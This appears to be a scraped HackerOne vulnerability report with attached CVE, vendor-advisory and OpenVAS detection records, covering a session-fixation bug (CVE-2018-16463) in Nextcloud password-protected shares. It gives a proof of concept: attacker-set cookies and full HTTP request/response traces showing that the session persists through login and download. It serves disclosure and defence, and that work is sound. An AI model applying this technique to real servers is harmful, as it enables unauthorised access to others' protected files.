Nextcloud: Session fixation in password protected public download.
2017-06-06T09:17:29
ID H1:237184 Type hackerone Reporter frankspierings Modified 2018-10-25T10:26:31
Description
Public downloads protected with a password are vulnerable to a session fixation attack. This finding was discovered during a penetration test of NextCloud version 10.0.2.7.
1) Pre-provision a victim with the attacker controlled cookie values:
2) The victim receives a public download link for a file. This resource is password protected by NextCloud.
Downloading the file consists of several requests. Notice that all requests are being performed with the pre-provisioned cookies. These cookies are never replaced after successful authentication.
Request:
GET /index.php/s/Ezn3dOeZ28Hph57 HTTP/1.1
Host: www.clouddrive.example
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: __Host-nc_sameSiteCookielax=TRUE; __Host-nc_sameSiteCookiestrict=TRUE; ocu1w9tvnra8=AAAAAAAAAAAAAAAAAAAAAAAAA1; oc_sessionPassphrase=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1
Connection: close
Upgrade-Insecure-Requests: 1
This file could be acquired through session fixation.
```
3) The attacker needs the following to acquire the file:
- Pre-provision the cookies in the victim's browser.
- Know the token to the public file.
{"id": "H1:237184", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "Nextcloud: Session fixation in password protected public download.", "description": "Public downloads protected with a password are vulnerable to a session fixation attack. This finding was discovered during a penetration test of NextCloud version 10.0.2.7.\n\n1) Pre-provision a victim with the attacker controlled cookie values:\n\nFirefox cookie manager:\n```\nwww.clouddrive.example\tFALSE\t%2F\tFALSE\t0\tocu1w9tvnra8\tAAAAAAAAAAAAAAAAAAAAAAAAA1\nwww.clouddrive.example\tFALSE\t%2F\tTRUE\t0\toc_sessionPassphrase\tAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1\nwww.clouddrive.example\tFALSE\t%2F\tTRUE\t4133980799\t__Host-nc_sameSiteCookielax\tTRUE\nwww.clouddrive.example\tFALSE\t%2F\tTRUE\t4133980799\t__Host-nc_sameSiteCookiestrict\tTRUE \n```\n\n2) The victim receives a public download link for a file. This resource is password protected by NextCloud. \nDownloading the file consists of several requests. Notice that all requests are being performed with the pre-provisioned cookies. These cookies are never replaced after successful authentication.\n\nRequest:\n```\nGET /index.php/s/Ezn3dOeZ28Hph57 HTTP/1.1\nHost: www.clouddrive.example\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nCookie: __Host-nc_sameSiteCookielax=TRUE; __Host-nc_sameSiteCookiestrict=TRUE; ocu1w9tvnra8=AAAAAAAAAAAAAAAAAAAAAAAAA1; oc_sessionPassphrase=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1\nConnection: close\nUpgrade-Insecure-Requests: 1\n```\n\nResponse:\n```\nHTTP/1.1 302 Found\nDate: Tue, 06 Jun 2017 08:26:52 GMT\nServer: Apache\nX-Powered-By: PHP/7.0.17\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate\nPragma: no-cache\nContent-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-eval' 'nonce-a3N2dzQremRnTmJLdytUaWJoZkEvenVZUHYwRjhDZVFUT2dacUNyb0s0ND06MnIrS3pMU3Y2T0MvcXFpb0ZGNlB5bFgvRDdSZnNtN25QN3hmNzFpcVc4TT0='; style-src 'self' 'unsafe-inline'; frame-src *; img-src * data: blob:; font-src 'self' data:; media-src *; connect-src *\nSet-Cookie: __Host-nc_sameSiteCookielax=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=lax\nSet-Cookie: __Host-nc_sameSiteCookiestrict=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=strict\nLocation: /index.php/s/Ezn3dOeZ28Hph57\nX-Content-Type-Options: nosniff\nX-XSS-Protection: 1; mode=block\nX-Robots-Tag: none\nX-Frame-Options: SAMEORIGIN\nX-Download-Options: noopen\nX-Permitted-Cross-Domain-Policies: none\nConnection: close\nContent-Type: text/html; charset=UTF-8\nStrict-Transport-Security: max-age=16000000; includeSubDomains; preload;\nContent-Length: 0\n```\n\nRequest:\n```\nGET /index.php/s/Ezn3dOeZ28Hph57 HTTP/1.1\nHost: www.clouddrive.example\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nCookie: __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; ocu1w9tvnra8=AAAAAAAAAAAAAAAAAAAAAAAAA1; oc_sessionPassphrase=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1\nConnection: close\nUpgrade-Insecure-Requests: 1\n```\n\nResponse:\n```\nHTTP/1.1 303 See Other\nDate: Tue, 06 Jun 2017 08:26:54 GMT\nServer: Apache\nX-Powered-By: PHP/7.0.17\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nPragma: no-cache\nCache-Control: no-cache, must-revalidate\nContent-Security-Policy: default-src 'none';script-src 'nonce-S1pwTXU1dEdaSEVkSFZPeENMR01jbVBxcGZLSmJTaC9CS0lpNHZtOGNnWT06WWU0MmxNTTBERWRvZEIvN2N2akRSdzJObEx2VEwyRUlkL1prcFl2K0Frcz0=' 'unsafe-eval';style-src 'self' 'unsafe-inline';img-src 'self' data: blob:;font-src 'self';connect-src 'self';media-src 'self'\nLocation: /index.php/s/Ezn3dOeZ28Hph57/authenticate\nX-Content-Type-Options: nosniff\nX-XSS-Protection: 1; mode=block\nX-Robots-Tag: none\nX-Frame-Options: SAMEORIGIN\nX-Download-Options: noopen\nX-Permitted-Cross-Domain-Policies: none\nConnection: close\nContent-Type: text/html; charset=UTF-8\nStrict-Transport-Security: max-age=16000000; includeSubDomains; preload;\nContent-Length: 0\n```\n\nRequest:\n```\nGET /index.php/s/Ezn3dOeZ28Hph57/authenticate HTTP/1.1\nHost: www.clouddrive.example\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nCookie: __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; ocu1w9tvnra8=AAAAAAAAAAAAAAAAAAAAAAAAA1; oc_sessionPassphrase=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1\nConnection: close\nUpgrade-Insecure-Requests: 1\n```\n\nResponse:\n```\nHTTP/1.1 200 OK\nDate: Tue, 06 Jun 2017 08:26:56 GMT\nServer: Apache\nX-Powered-By: PHP/7.0.17\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nPragma: no-cache\nCache-Control: no-cache, must-revalidate\nContent-Security-Policy: default-src 'none';script-src 'nonce-NnBNTW9hUjVmeWJUNzJkdm1YaDFJQUhzV2hnL2VqVEgrdHlDSmJ5Rzc0dz06b3VkMmp2d0xGeENtaGlzbDR6RTZGVytMYTFGbE9IMndpWWpFWXM3RW44RT0=' 'unsafe-eval';style-src 'self' 'unsafe-inline';img-src 'self' data: blob:;font-src 'self';connect-src 'self';media-src 'self'\nContent-Length: 17294\nX-Content-Type-Options: nosniff\nX-XSS-Protection: 1; mode=block\nX-Robots-Tag: none\nX-Frame-Options: SAMEORIGIN\nX-Download-Options: noopen\nX-Permitted-Cross-Domain-Policies: none\nConnection: close\nContent-Type: text/html; charset=UTF-8\nStrict-Transport-Security: max-age=16000000; includeSubDomains; preload;\n```\n\nNow the authentication takes place:\n\nRequest:\n```\nPOST /index.php/s/Ezn3dOeZ28Hph57/authenticate HTTP/1.1\nHost: www.clouddrive.example\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 144\nCookie: __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; ocu1w9tvnra8=AAAAAAAAAAAAAAAAAAAAAAAAA1; oc_sessionPassphrase=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1\nConnection: close\nUpgrade-Insecure-Requests: 1\n\nrequesttoken=6pMMoaR5fybT72dvmXh1IAHsWhg%2FejTH%2BtyCJbyG74w%3D%3Aoud2jvwLFxCmhisl4zE6FW%2BLa1FlOH2wiYjEYs7En8E%3D&password=SessionFixation01%21\n```\n\nResponse:\n```\nHTTP/1.1 303 See Other\nDate: Tue, 06 Jun 2017 08:27:10 GMT\nServer: Apache\nX-Powered-By: PHP/7.0.17\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nPragma: no-cache\nCache-Control: no-cache, must-revalidate\nContent-Security-Policy: default-src 'none';script-src 'nonce-M3hVNVRMdTJkYWZGNTFoQVN4VHcrRTZ6b2dHUkg0SnQrM0w4Z01VNU1MST06bDJGRFkrUEVIWkd3amhRS01WMi96U0RVazBqTFhjc2FpQ2E2eDdkN1FQOD0=' 'unsafe-eval';style-src 'self' 'unsafe-inline';img-src 'self' data: blob:;font-src 'self';connect-src 'self';media-src 'self'\nLocation: /index.php/s/Ezn3dOeZ28Hph57\nX-Content-Type-Options: nosniff\nX-XSS-Protection: 1; mode=block\nX-Robots-Tag: none\nX-Frame-Options: SAMEORIGIN\nX-Download-Options: noopen\nX-Permitted-Cross-Domain-Policies: none\nConnection: close\nContent-Type: text/html; charset=UTF-8\nStrict-Transport-Security: max-age=16000000; includeSubDomains; preload;\nContent-Length: 0\n```\n\nRequest:\n```\nGET /index.php/s/Ezn3dOeZ28Hph57 HTTP/1.1\nHost: www.clouddrive.example\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nCookie: __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; ocu1w9tvnra8=AAAAAAAAAAAAAAAAAAAAAAAAA1; oc_sessionPassphrase=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1\nConnection: close\nUpgrade-Insecure-Requests: 1\n```\n\nResponse Headers:\n```\nHTTP/1.1 200 OK\nDate: Tue, 06 Jun 2017 08:27:12 GMT\nServer: Apache\nX-Powered-By: PHP/7.0.17\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nPragma: no-cache\nCache-Control: no-cache, must-revalidate\nContent-Security-Policy: default-src 'none';script-src 'nonce-aGcyeFVwaml6OGprZWpNbWdBUFVvMkMyM0p0WVpWUXdTNkpPKzlkZHZPND06em5uTGZjQ1FwLzZSRTM5cytrcWJsZzdSN2RJQ0p4MUhPUFlJdktVZnpLTT0=' 'unsafe-eval';style-src 'self' 'unsafe-inline';img-src 'self' data: blob:;font-src 'self';connect-src 'self';media-src 'self';frame-src 'self'\nContent-Length: 20599\nX-Content-Type-Options: nosniff\nX-XSS-Protection: 1; mode=block\nX-Robots-Tag: none\nX-Frame-Options: SAMEORIGIN\nX-Download-Options: noopen\nX-Permitted-Cross-Domain-Policies: none\nConnection: close\nContent-Type: text/html; charset=UTF-8\nStrict-Transport-Security: max-age=16000000; includeSubDomains; preload;\n```\n\nClicking the direct download button will generate the following:\n\nRequest:\n```\nGET /index.php/s/Ezn3dOeZ28Hph57/download HTTP/1.1\nHost: www.clouddrive.example\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nCookie: __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; ocu1w9tvnra8=AAAAAAAAAAAAAAAAAAAAAAAAA1; oc_sessionPassphrase=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1\nConnection: close\nUpgrade-Insecure-Requests: 1\n```\n\nResponse:\n```\nHTTP/1.1 200 OK\nDate: Tue, 06 Jun 2017 08:29:11 GMT\nServer: Apache\nX-Powered-By: PHP/7.0.17\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate\nPragma: no-cache\nContent-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-eval' 'nonce-emRneTV0RDFQQXRibTlqY0phbUJsTm5QcTJSSGZ1RFVQWFgxZTROUFpyUT06aGF4SXlZaUhWRDB1OHBTV1grRE9vYmVvbWkwZFBLbWpUaUd6UFBFTkZ2az0='; style-src 'self' 'unsafe-inline'; frame-src *; img-src * data: blob:; font-src 'self' data:; media-src *; connect-src *\nContent-Disposition: attachment; filename*=UTF-8''Public%20Download%20-%20Session%20Fixation%20Example.txt; filename=\"Public%20Download%20-%20Session%20Fixation%20Example.txt\"\nOC-ETag: \"5936650b3d865\"\nLast-Modified: Tue, 06 Jun 2017 08:17:15 GMT\nETag: \"5936650b3d865\"\nContent-Length: 54\nX-Content-Type-Options: nosniff\nX-XSS-Protection: 1; mode=block\nX-Robots-Tag: none\nX-Frame-Options: SAMEORIGIN\nX-Download-Options: noopen\nX-Permitted-Cross-Domain-Policies: none\nContent-Type: text/plain;charset=UTF-8\nStrict-Transport-Security: max-age=16000000; includeSubDomains; preload;\n\nThis file could be acquired through session fixation.\n```\n\n3) The attacker needs the following to acquire the file:\n- Pre-provision the cookies in the victim's browser.\n- Know the token to the public file.", "published": "2017-06-06T09:17:29", "modified": "2018-10-25T10:26:31", "cvss": {"score": 3.6, "vector": "AV:NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "href": "https://hackerone.com/reports/237184", "reporter": "frankspierings", "references": [], "cvelist": ["CVE-2018-16463"], "lastseen": "2019-01-18T14:06:48", "viewCount": 5, "enchantments": {"score": {"value": 4.9, "vector": "NONE", "modified": "2019-01-18T14:06:48", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-16463"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310112416", "OPENVAS:1361412562310112417"]}, {"type": "nextcloud", "idList": ["NC-SA-2018-013"]}], "modified": "2019-01-18T14:06:48", "rev": 2}, "vulnersScore": 4.9}, "bounty": 50.0, "bountyState": "resolved", "h1team": {"handle": "nextcloud", "profile_picture_urls": {"medium": "https://profile-photos.hackerone-user-content.com/000/013/291/1d2ac8991616fcd3e3cdd567d02b7e70e20a3883_medium.png?1491410731", "small": "https://profile-photos.hackerone-user-content.com/000/013/291/5d33b6e08fad356e1743fd899fe7d6dda9971209_small.png?1491410731"}, "url": "https://hackerone.com/nextcloud"}, "h1reporter": {"disabled": false, "hacker_mediation": false, "hackerone_triager": false, "is_me?": false, "profile_picture_urls": {"small": "/assets/avatars/default-71a302d706457f3d3a31eb30fa3e73e6cf0b1d677b8fa218eaeaffd67ae97918.png"}, "url": "/frankspierings", "username": "frankspierings"}}
{"cve": [{"lastseen": "2021-02-02T06:52:31", "description": "A bug causing session fixation in Nextcloud Server prior to 14.0.0, 13.0.3 and 12.0.8 could potentially allow an attacker to obtain access to password protected shares.", "edition": 7, "cvss3": {"exploitabilityScore": 0.5, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 3.1, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.5}, "published": "2018-10-30T21:29:00", "title": "CVE-2018-16463", "type": "cve", "cwe": ["CWE-384"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.6, "vectorString": "AV:N/AC:H/Au:S/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-16463"], "modified": "2019-10-09T23:36:00", "cpe": ["cpe:/a:nextcloud:nextcloud_server:14.0.0"], "id": "CVE-2018-16463", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-16463", "cvss": {"score": 3.6, "vector": "AV:N/AC:H/Au:S/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:a:nextcloud:nextcloud_server:14.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:nextcloud:nextcloud_server:14.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:nextcloud:nextcloud_server:14.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:nextcloud:nextcloud_server:14.0.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:nextcloud:nextcloud_server:14.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:nextcloud:nextcloud_server:14.0.0:beta4:*:*:*:*:*:*"]}], "nextcloud": [{"lastseen": "2020-12-24T11:41:06", "bulletinFamily": "software", "cvelist": ["CVE-2018-16463"], "description": "A bug causing session fixation could potentially allow an attacker to obtain access to password protected shares.", "modified": "2018-10-25T00:00:00", "published": "2018-10-25T00:00:00", "id": "NC-SA-2018-013", "href": "https://nextcloud.com/security/advisory/?id=NC-SA-2018-013", "type": "nextcloud", "title": "Session fixation on public share page (NC-SA-2018-013)", "cvss": {"score": 3.6, "vector": "AV:N/AC:H/Au:S/C:P/I:P/A:N"}}], "openvas": [{"lastseen": "2020-02-10T15:36:42", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-16463"], "description": "This host is running Nextcloud Server\n and is prone to a session fixation vulnerability.", "modified": "2020-02-07T00:00:00", "published": "2018-11-01T00:00:00", "id": "OPENVAS:1361412562310112417", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310112417", "type": "openvas", "title": "Nextcloud Server < 14.0.0, < 13.0.3, < 12.0.8 Session fixation on public share page (NC-SA-2018-013) (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Nextcloud Server < 14.0.0, < 13.0.3, < 12.0.8 Session fixation on public share page (NC-SA-2018-013) (Windows)\n#\n# Authors:\n# Adrian Steins <adrian.steins@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.112417\");\n script_version(\"2020-02-07T08:53:35+0000\");\n script_tag(name:\"last_modification\", value:\"2020-02-07 08:53:35 +0000 (Fri, 07 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-11-01 11:49:50 +0100 (Thu, 01 Nov 2018)\");\n script_tag(name:\"cvss_base\", value:\"3.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:S/C:P/I:P/A:N\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2018-16463\");\n\n script_name(\"Nextcloud Server < 14.0.0, < 13.0.3, < 12.0.8 Session fixation on public share page (NC-SA-2018-013) (Windows)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_nextcloud_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"nextcloud/installed\", \"Host/runs_windows\");\n\n script_tag(name:\"summary\", value:\"This host is running Nextcloud Server\n and is prone to a session fixation vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"A bug causing session fixation could potentially\n allow an attacker to obtain access to password protected shares.\");\n\n script_tag(name:\"affected\", value:\"Nextcloud Server before version 14.0.0, 13.0.x\n before 13.0.3 and 12.0.x before 12.0.8.\");\n\n script_tag(name:\"solution\", value:\"Upgrade Nextcloud Server to version 12.0.8, 13.0.3,\n or 14.0.0 respectively.\");\n\n script_xref(name:\"URL\", value:\"https://hackerone.com/reports/237184\");\n script_xref(name:\"URL\", value:\"https://nextcloud.com/security/advisory/?id=NC-SA-2018-013\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:nextcloud:nextcloud\";\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe:CPE))\n exit(0);\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:port, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_is_less(version:vers, test_version:\"12.0.8\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"12.0.8\", install_path:path);\n security_message(port:port, data:report);\n exit(0);\n}\n\nif(version_in_range(version:vers, test_version:\"13.0.0\", test_version2:\"13.0.2\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"13.0.3\", install_path:path);\n security_message(port:port, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 3.6, "vector": "AV:N/AC:H/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2020-02-10T15:36:42", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-16463"], "description": "This host is running Nextcloud Server\n and is prone to a session fixation vulnerability.", "modified": "2020-02-07T00:00:00", "published": "2018-11-01T00:00:00", "id": "OPENVAS:1361412562310112416", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310112416", "type": "openvas", "title": "Nextcloud Server < 14.0.0, < 13.0.3, < 12.0.8 Session fixation on public share page (NC-SA-2018-013) (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Nextcloud Server < 14.0.0, < 13.0.3, < 12.0.8 Session fixation on public share page (NC-SA-2018-013) (Linux)\n#\n# Authors:\n# Adrian Steins <adrian.steins@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.112416\");\n script_version(\"2020-02-07T08:53:35+0000\");\n script_tag(name:\"last_modification\", value:\"2020-02-07 08:53:35 +0000 (Fri, 07 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-11-01 11:49:50 +0100 (Thu, 01 Nov 2018)\");\n script_tag(name:\"cvss_base\", value:\"3.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:S/C:P/I:P/A:N\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2018-16463\");\n\n script_name(\"Nextcloud Server < 14.0.0, < 13.0.3, < 12.0.8 Session fixation on public share page (NC-SA-2018-013) (Linux)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_nextcloud_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"nextcloud/installed\", \"Host/runs_unixoide\");\n\n script_tag(name:\"summary\", value:\"This host is running Nextcloud Server\n and is prone to a session fixation vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"A bug causing session fixation could potentially\n allow an attacker to obtain access to password protected shares.\");\n\n script_tag(name:\"affected\", value:\"Nextcloud Server before version 14.0.0, 13.0.x\n before 13.0.3 and 12.0.x before 12.0.8.\");\n\n script_tag(name:\"solution\", value:\"Upgrade Nextcloud Server to version 12.0.8, 13.0.3,\n or 14.0.0 respectively.\");\n\n script_xref(name:\"URL\", value:\"https://hackerone.com/reports/237184\");\n script_xref(name:\"URL\", value:\"https://nextcloud.com/security/advisory/?id=NC-SA-2018-013\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:nextcloud:nextcloud\";\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe:CPE))\n exit(0);\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:port, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_is_less(version:vers, test_version:\"12.0.8\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"12.0.8\", install_path:path);\n security_message(port:port, data:report);\n exit(0);\n}\n\nif(version_in_range(version:vers, test_version:\"13.0.0\", test_version2:\"13.0.2\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"13.0.3\", install_path:path);\n security_message(port:port, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 3.6, "vector": "AV:N/AC:H/Au:S/C:P/I:P/A:N"}}]}
